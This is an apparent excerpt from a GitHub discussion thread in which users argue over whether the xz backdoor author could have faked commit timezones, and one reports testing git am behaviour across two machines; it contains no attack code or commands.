And why this insistence on not taking into account this issue? It seems completely normal to me that a hacker would try to fake the time zone. BTW, I am NOT accusing Lasse Collin of being Jia Tan.

@AdrianBunk

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

@redcode

redcode commented Apr 1, 2024

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

OK, I've done it, using 2 machines. The 1st one with GMT+0, and the 2nd one with GMT+2, where I've applied the patches with git am. And, as the documentation says, AuthorDate has been replaced by CommitDate:

